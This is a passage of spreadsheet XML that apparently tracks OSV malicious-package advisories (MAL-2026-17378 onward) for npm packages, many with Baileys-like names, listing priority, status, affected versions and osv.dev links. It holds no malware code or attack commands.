          <t>npm:@sairidev/baileys-new</t>
        </is>
      </c>
      <c r="M703" s="5" t="inlineStr"/>
      <c r="N703" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O703" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P703" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q703" s="5" t="inlineStr"/>
      <c r="R703" s="5" t="inlineStr"/>
      <c r="S70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@sairidev/baileys-new (npm), version(s): 0.3.21.</t>
        </is>
      </c>
      <c r="T703" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17378</t>
        </is>
      </c>
    </row>
    <row r="704">
      <c r="A704" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B704" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C704" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17379</t>
        </is>
      </c>
      <c r="D704" s="5" t="inlineStr"/>
      <c r="E704" s="5" t="inlineStr"/>
      <c r="F704" s="5" t="inlineStr"/>
      <c r="G704" s="5" t="inlineStr"/>
      <c r="H704" s="5" t="inlineStr"/>
      <c r="I704" s="5" t="inlineStr"/>
      <c r="J704" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K704" s="5" t="inlineStr"/>
      <c r="L704" s="5" t="inlineStr">
        <is>
          <t>npm:@sakataoffc/baileys</t>
        </is>
      </c>
      <c r="M704" s="5" t="inlineStr"/>
      <c r="N704" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O704" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P704" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q704" s="5" t="inlineStr"/>
      <c r="R704" s="5" t="inlineStr"/>
      <c r="S70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@sakataoffc/baileys (npm), version(s): 8.0.0, 7.0.0, 6.0.0, 5.0.1, 5.0.0, 4.0.0, 3.0.0, 2.0.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T704" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17379</t>
        </is>
      </c>
    </row>
    <row r="705">
      <c r="A705" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B705" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C705" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17380</t>
        </is>
      </c>
      <c r="D705" s="5" t="inlineStr"/>
      <c r="E705" s="5" t="inlineStr"/>
      <c r="F705" s="5" t="inlineStr"/>
      <c r="G705" s="5" t="inlineStr"/>
      <c r="H705" s="5" t="inlineStr"/>
      <c r="I705" s="5" t="inlineStr"/>
      <c r="J705" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K705" s="5" t="inlineStr"/>
      <c r="L705" s="5" t="inlineStr">
        <is>
          <t>npm:@teamolduser/baileys</t>
        </is>
      </c>
      <c r="M705" s="5" t="inlineStr"/>
      <c r="N705" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O705" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P705" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q705" s="5" t="inlineStr"/>
      <c r="R705" s="5" t="inlineStr"/>
      <c r="S70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@teamolduser/baileys (npm), version(s): 9.10.1, 9.7.3-beta.1, 9.7.2.</t>
        </is>
      </c>
      <c r="T705" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17380</t>
        </is>
      </c>
    </row>
    <row r="706">
      <c r="A706" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B706" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C706" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17381</t>
        </is>
      </c>
      <c r="D706" s="5" t="inlineStr"/>
      <c r="E706" s="5" t="inlineStr"/>
      <c r="F706" s="5" t="inlineStr"/>
      <c r="G706" s="5" t="inlineStr"/>
      <c r="H706" s="5" t="inlineStr"/>
      <c r="I706" s="5" t="inlineStr"/>
      <c r="J706" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K706" s="5" t="inlineStr"/>
      <c r="L706" s="5" t="inlineStr">
        <is>
          <t>npm:@wanzlonely/bails4u</t>
        </is>
      </c>
      <c r="M706" s="5" t="inlineStr"/>
      <c r="N706" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O706" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P706" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q706" s="5" t="inlineStr"/>
      <c r="R706" s="5" t="inlineStr"/>
      <c r="S70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@wanzlonely/bails4u (npm), version(s): 5.0.0, 4.0.0, 3.0.0, 2.0.0.</t>
        </is>
      </c>
      <c r="T706" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17381</t>
        </is>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B707" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C707" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17382</t>
        </is>
      </c>
      <c r="D707" s="5" t="inlineStr"/>
      <c r="E707" s="5" t="inlineStr"/>
      <c r="F707" s="5" t="inlineStr"/>
      <c r="G707" s="5" t="inlineStr"/>
      <c r="H707" s="5" t="inlineStr"/>
      <c r="I707" s="5" t="inlineStr"/>
      <c r="J707" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K707" s="5" t="inlineStr"/>
      <c r="L707" s="5" t="inlineStr">
        <is>
          <t>npm:@wenzyx1/bails</t>
        </is>
      </c>
      <c r="M707" s="5" t="inlineStr"/>
      <c r="N707" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O707" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P707" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q707" s="5" t="inlineStr"/>
      <c r="R707" s="5" t="inlineStr"/>
      <c r="S70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@wenzyx1/bails (npm), version(s): 1.0.1, 1.0.0.</t>
        </is>
      </c>
      <c r="T707" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17382</t>
        </is>
      </c>
    </row>
    <row r="708">
      <c r="A708" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B708" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C708" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17383</t>
        </is>
      </c>
      <c r="D708" s="5" t="inlineStr"/>
      <c r="E708" s="5" t="inlineStr"/>
      <c r="F708" s="5" t="inlineStr"/>
      <c r="G708" s="5" t="inlineStr"/>
      <c r="H708" s="5" t="inlineStr"/>
      <c r="I708" s="5" t="inlineStr"/>
      <c r="J708" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K708" s="5" t="inlineStr"/>
      <c r="L708" s="5" t="inlineStr">
        <is>
          <t>npm:@xatancchii/velycxbail</t>
        </is>
      </c>
      <c r="M708" s="5" t="inlineStr"/>
      <c r="N708" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O708" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P708" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q708" s="5" t="inlineStr"/>
      <c r="R708" s="5" t="inlineStr"/>
      <c r="S70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@xatancchii/velycxbail (npm), version(s): 1.1.0.</t>
        </is>
      </c>
      <c r="T708" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17383</t>
        </is>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B709" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C709" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17384</t>
        </is>
      </c>
      <c r="D709" s="5" t="inlineStr"/>
      <c r="E709" s="5" t="inlineStr"/>
      <c r="F709" s="5" t="inlineStr"/>
      <c r="G709" s="5" t="inlineStr"/>
      <c r="H709" s="5" t="inlineStr"/>
      <c r="I709" s="5" t="inlineStr"/>
      <c r="J709" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K709" s="5" t="inlineStr"/>
      <c r="L709" s="5" t="inlineStr">
        <is>
          <t>npm:@xayz/baileys</t>
        </is>
      </c>
      <c r="M709" s="5" t="inlineStr"/>
      <c r="N709" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O709" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P709" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q709" s="5" t="inlineStr"/>
      <c r="R709" s="5" t="inlineStr"/>
      <c r="S70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@xayz/baileys (npm), version(s): 6.1.8, 6.1.7, 6.1.6, 6.1.5, 6.1.4, 6.1.3, 6.1.2, 6.1.1, 6.1.0, 6.0.75, 6.0.6, 6.0.5, 6.0.4, 6.0.3, 6.0.2, 6.0.1, 6.0.0, 5.0.0, 4.0.0, 3.0.0.</t>
        </is>
      </c>
      <c r="T709" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17384</t>
        </is>
      </c>
    </row>
    <row r="710">
      <c r="A710" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B710" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C710" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17385</t>
        </is>
      </c>
      <c r="D710" s="5" t="inlineStr"/>
      <c r="E710" s="5" t="inlineStr"/>
      <c r="F710" s="5" t="inlineStr"/>
      <c r="G710" s="5" t="inlineStr"/>
      <c r="H710" s="5" t="inlineStr"/>
      <c r="I710" s="5" t="inlineStr"/>
      <c r="J710" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K710" s="5" t="inlineStr"/>
      <c r="L710" s="5" t="inlineStr">
        <is>
          <t>npm:albert-anitabaileys</t>
        </is>
      </c>
      <c r="M710" s="5" t="inlineStr"/>
      <c r="N710" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O710" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P710" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q710" s="5" t="inlineStr"/>
      <c r="R710" s="5" t="inlineStr"/>
      <c r="S71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albert-anitabaileys (npm), version(s): 1.1.13.</t>
        </is>
      </c>
      <c r="T710" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17385</t>
        </is>
      </c>
    </row>
    <row r="711">
      <c r="A711" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B711" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C711" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17386</t>
        </is>
      </c>
      <c r="D711" s="5" t="inlineStr"/>
      <c r="E711" s="5" t="inlineStr"/>
      <c r="F711" s="5" t="inlineStr"/>
      <c r="G711" s="5" t="inlineStr"/>
      <c r="H711" s="5" t="inlineStr"/>
      <c r="I711" s="5" t="inlineStr"/>
      <c r="J711" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K711" s="5" t="inlineStr"/>
      <c r="L711" s="5" t="inlineStr">
        <is>
          <t>npm:anuaja</t>
        </is>
      </c>
      <c r="M711" s="5" t="inlineStr"/>
      <c r="N711" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O711" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P711" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q711" s="5" t="inlineStr"/>
      <c r="R711" s="5" t="inlineStr"/>
      <c r="S71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anuaja (npm), version(s): 1.1.1, 1.1.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T711" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17386</t>
        </is>
      </c>
    </row>
    <row r="712">
      <c r="A712" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B712" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C712" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17387</t>
        </is>
      </c>
      <c r="D712" s="5" t="inlineStr"/>
      <c r="E712" s="5" t="inlineStr"/>
      <c r="F712" s="5" t="inlineStr"/>
      <c r="G712" s="5" t="inlineStr"/>
      <c r="H712" s="5" t="inlineStr"/>
      <c r="I712" s="5" t="inlineStr"/>
      <c r="J712" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K712" s="5" t="inlineStr"/>
      <c r="L712" s="5" t="inlineStr">
        <is>
          <t>npm:arsya-baileys</t>
        </is>
      </c>
      <c r="M712" s="5" t="inlineStr"/>
      <c r="N712" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O712" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P712" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q712" s="5" t="inlineStr"/>
      <c r="R712" s="5" t="inlineStr"/>
      <c r="S71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arsya-baileys (npm), version(s): 9.2.0.</t>
        </is>
      </c>
      <c r="T712" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17387</t>
        </is>
      </c>
    </row>
    <row r="713">
      <c r="A713" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B713" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C713" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17388</t>
        </is>
      </c>
      <c r="D713" s="5" t="inlineStr"/>
      <c r="E713" s="5" t="inlineStr"/>
      <c r="F713" s="5" t="inlineStr"/>
      <c r="G713" s="5" t="inlineStr"/>
      <c r="H713" s="5" t="inlineStr"/>
      <c r="I713" s="5" t="inlineStr"/>
      <c r="J713" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K713" s="5" t="inlineStr"/>
      <c r="L713" s="5" t="inlineStr">
        <is>
          <t>npm:baileys-xbats</t>
        </is>
      </c>
      <c r="M713" s="5" t="inlineStr"/>
      <c r="N713" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O713" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P713" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q713" s="5" t="inlineStr"/>
      <c r="R713" s="5" t="inlineStr"/>
      <c r="S71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baileys-xbats (npm), version(s): 1.0.3, 1.0.2, 1.0.1, 1.0.0.</t>
        </is>
      </c>
      <c r="T713" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17388</t>
        </is>
      </c>
    </row>
    <row r="714">
      <c r="A714" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B714" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C714" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17389</t>
        </is>
      </c>
      <c r="D714" s="5" t="inlineStr"/>
      <c r="E714" s="5" t="inlineStr"/>
      <c r="F714" s="5" t="inlineStr"/>
      <c r="G714" s="5" t="inlineStr"/>
      <c r="H714" s="5" t="inlineStr"/>
      <c r="I714" s="5" t="inlineStr"/>
      <c r="J714" s="5" t="inlineStr">
        <is>
          <t>npm, go</t>
        </is>
      </c>
      <c r="K714" s="5" t="inlineStr"/>
      <c r="L714" s="5" t="inlineStr">
        <is>
          <t>npm:bungoma</t>
        </is>
      </c>
      <c r="M714" s="5" t="inlineStr"/>
      <c r="N714" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O714" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P714" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q714" s="5" t="inlineStr"/>
      <c r="R714" s="5" t="inlineStr"/>
      <c r="S71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bungoma (npm), version(s): 1.1.0, 1.0.1.</t>
        </is>
      </c>
      <c r="T714" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17389</t>
        </is>
      </c>
    </row>
    <row r="715">
      <c r="A715" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B715" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C715" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17390</t>
        </is>
      </c>
      <c r="D715" s="5" t="inlineStr"/>
      <c r="E715" s="5" t="inlineStr"/>
      <c r="F715" s="5" t="inlineStr"/>
      <c r="G715" s="5" t="inlineStr"/>
      <c r="H715" s="5" t="inlineStr"/>
      <c r="I715" s="5" t="inlineStr"/>
      <c r="J715" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K715" s="5" t="inlineStr"/>
      <c r="L715" s="5" t="inlineStr">
        <is>
          <t>npm:cantarella-baileys</t>
        </is>
      </c>
      <c r="M715" s="5" t="inlineStr"/>
      <c r="N715" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O715" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P715" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q715" s="5" t="inlineStr"/>
      <c r="R715" s="5" t="inlineStr"/>
      <c r="S71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cantarella-baileys (npm), version(s): 1.1.13, 1.1.12, 1.1.11.</t>
        </is>
      </c>
      <c r="T715" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17390</t>
        </is>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B716" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C716" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17391</t>
        </is>
      </c>
      <c r="D716" s="5" t="inlineStr"/>
      <c r="E716" s="5" t="inlineStr"/>
      <c r="F716" s="5" t="inlineStr"/>
      <c r="G716" s="5" t="inlineStr"/>
      <c r="H716" s="5" t="inlineStr"/>
      <c r="I716" s="5" t="inlineStr"/>
      <c r="J716" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K716" s="5" t="inlineStr"/>
      <c r="L716" s="5" t="inlineStr">
        <is>
          <t>npm:eliteprotech-baileys</t>
        </is>
      </c>
      <c r="M716" s="5" t="inlineStr"/>
      <c r="N716" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O716" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P716" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q716" s="5" t="inlineStr"/>
      <c r="R716" s="5" t="inlineStr"/>
      <c r="S71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eliteprotech-baileys (npm), version(s): 1.1.2, 1.1.1, 1.1.0.</t>
        </is>
      </c>
      <c r="T716" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17391</t>
        </is>
      </c>
    </row>
    <row r="717">
      <c r="A717" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B717" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C717" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17392</t>
        </is>
      </c>
      <c r="D717" s="5" t="inlineStr"/>
      <c r="E717" s="5" t="inlineStr"/>
      <c r="F717" s="5" t="inlineStr"/>
      <c r="G717" s="5" t="inlineStr"/>
      <c r="H717" s="5" t="inlineStr"/>
      <c r="I717" s="5" t="inlineStr"/>
      <c r="J717" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K717" s="5" t="inlineStr"/>
      <c r="L717" s="5" t="inlineStr">
        <is>
          <t>npm:focashi</t>
        </is>
      </c>
      <c r="M717" s="5" t="inlineStr"/>
      <c r="N717" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O717" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P717" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q717" s="5" t="inlineStr"/>
      <c r="R717" s="5" t="inlineStr"/>
      <c r="S71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focashi (npm), version(s): 1.1.0.</t>
        </is>
      </c>
      <c r="T717" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17392</t>
        </is>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B718" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C718" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17393</t>
        </is>
      </c>
      <c r="D718" s="5" t="inlineStr"/>
      <c r="E718" s="5" t="inlineStr"/>
      <c r="F718" s="5" t="inlineStr"/>
      <c r="G718" s="5" t="inlineStr"/>
      <c r="H718" s="5" t="inlineStr"/>
      <c r="I718" s="5" t="inlineStr"/>
      <c r="J718" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K718" s="5" t="inlineStr"/>
      <c r="L718" s="5" t="inlineStr">
        <is>
          <t>npm:ishumdz-bail</t>
        </is>
      </c>
      <c r="M718" s="5" t="inlineStr"/>
      <c r="N718" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O718" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P718" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q718" s="5" t="inlineStr"/>
      <c r="R718" s="5" t="inlineStr"/>
      <c r="S71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ishumdz-bail (npm), version(s): 1.0.16, 1.0.15, 1.0.14, 1.0.13, 1.0.11, 1.0.10, 1.0.9, 1.0.8, 1.0.7, 1.0.6, 1.0.4, 1.0.3, 1.0.2, 1.0.1.</t>
        </is>
      </c>
      <c r="T718" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17393</t>
        </is>
      </c>
    </row>
    <row r="719">
      <c r="A719" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B719" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C719" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17394</t>
        </is>
      </c>
      <c r="D719" s="5" t="inlineStr"/>
      <c r="E719" s="5" t="inlineStr"/>
      <c r="F719" s="5" t="inlineStr"/>
      <c r="G719" s="5" t="inlineStr"/>
      <c r="H719" s="5" t="inlineStr"/>
      <c r="I719" s="5" t="inlineStr"/>
      <c r="J719" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K719" s="5" t="inlineStr"/>
      <c r="L719" s="5" t="inlineStr">
        <is>
          <t>npm:kasabaileys</t>
        </is>
      </c>
      <c r="M719" s="5" t="inlineStr"/>
      <c r="N719" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O719" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P719" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q719" s="5" t="inlineStr"/>
      <c r="R719" s="5" t="inlineStr"/>
      <c r="S71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kasabaileys (npm), version(s): 1.0.2, 1.0.1, 1.0.0, 0.3.15.</t>
        </is>
      </c>
      <c r="T719" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17394</t>
        </is>
      </c>
    </row>
    <row r="720">
      <c r="A720" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B720" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C720" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17395</t>
        </is>
      </c>
      <c r="D720" s="5" t="inlineStr"/>
      <c r="E720" s="5" t="inlineStr"/>
      <c r="F720" s="5" t="inlineStr"/>
      <c r="G720" s="5" t="inlineStr"/>
      <c r="H720" s="5" t="inlineStr"/>
      <c r="I720" s="5" t="inlineStr"/>
      <c r="J720" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K720" s="5" t="inlineStr"/>
      <c r="L720" s="5" t="inlineStr">
        <is>
          <t>npm:keithbaileys</t>
        </is>
      </c>
      <c r="M720" s="5" t="inlineStr"/>
      <c r="N720" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O720" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P720" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q720" s="5" t="inlineStr"/>
      <c r="R720" s="5" t="inlineStr"/>
      <c r="S72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keithbaileys (npm), version(s): 1.1.1, 1.1.0, 1.0.8.</t>
        </is>
      </c>
      <c r="T720" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17395</t>
        </is>
      </c>
    </row>
    <row r="721">
      <c r="A721" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B721" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C721" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17396</t>
        </is>
      </c>
      <c r="D721" s="5" t="inlineStr"/>
      <c r="E721" s="5" t="inlineStr"/>
      <c r="F721" s="5" t="inlineStr"/>
      <c r="G721" s="5" t="inlineStr"/>
      <c r="H721" s="5" t="inlineStr"/>
      <c r="I721" s="5" t="inlineStr"/>
      <c r="J721" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K721" s="5" t="inlineStr"/>
      <c r="L721" s="5" t="inlineStr">
        <is>
          <t>npm:kiyoramarkets</t>
        </is>
      </c>
      <c r="M721" s="5" t="inlineStr"/>
      <c r="N721" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O721" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P721" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q721" s="5" t="inlineStr"/>
      <c r="R721" s="5" t="inlineStr"/>
      <c r="S72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kiyoramarkets (npm), version(s): 8.0.16.</t>
        </is>
      </c>
      <c r="T721" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17396</t>
        </is>
      </c>
    </row>
    <row r="722">
      <c r="A722" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B722" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C722" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17397</t>
        </is>
      </c>
      <c r="D722" s="5" t="inlineStr"/>
      <c r="E722" s="5" t="inlineStr"/>
      <c r="F722" s="5" t="inlineStr"/>
      <c r="G722" s="5" t="inlineStr"/>
      <c r="H722" s="5" t="inlineStr"/>
      <c r="I722" s="5" t="inlineStr"/>
      <c r="J722" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K722" s="5" t="inlineStr"/>
      <c r="L722" s="5" t="inlineStr">
        <is>
          <t>npm:levvleys</t>
        </is>
      </c>
      <c r="M722" s="5" t="inlineStr"/>
      <c r="N722" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O722" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P722" s="5" t="inlineStr">
        <is>
